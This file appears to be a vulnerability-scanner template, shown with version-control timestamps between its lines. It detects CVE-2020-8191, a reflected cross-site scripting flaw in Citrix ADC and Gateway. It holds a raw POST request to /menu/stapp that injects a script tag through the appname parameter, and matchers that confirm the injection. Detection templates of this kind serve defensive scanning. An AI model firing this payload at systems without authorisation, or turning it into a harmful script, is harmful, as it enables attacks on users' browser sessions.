2021-01-02 04:56:15 +00:00
id : CVE-2020-8191
2020-07-11 17:53:33 +00:00
info :
2022-09-08 13:28:46 +00:00
name : Citrix ADC/Gateway - Cross-Site Scripting
2020-07-11 17:53:33 +00:00
author : dwisiswant0
2021-09-10 11:26:40 +00:00
severity : medium
2021-03-16 15:04:09 +00:00
description : |
2022-09-08 13:28:46 +00:00
Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://support.citrix.com/article/CTX276688
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8191
2024-01-29 17:11:14 +00:00
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/jweny/pocassistdb
- https://github.com/stratosphereips/nist-cve-search-tool
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8191
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.0021
2024-05-31 19:23:20 +00:00
epss-percentile : 0.58946
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : citrix
product : application_delivery_controller_firmware
tags : cve,cve2020,citrix,xss
2020-07-11 17:53:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-11 17:53:33 +00:00
- raw :
- |
POST /menu/stapp HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
X-NITRO-USER : xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
2021-09-08 12:17:19 +00:00
2020-07-11 17:53:33 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-07-11 17:53:33 +00:00
words :
- "</title><script>alert(31337)</script>"
2021-05-05 11:34:46 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-05-05 11:34:46 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 490a0046304402206617e4956f9404435cacd0175a72eb6deb5b1eead694622dc445086a67a221db022072a353f4336bd25c50f2cafca5951b2056e8b0e4937b2ae92d665df184f60d69:922c64590222798bb761d5b6d8e72950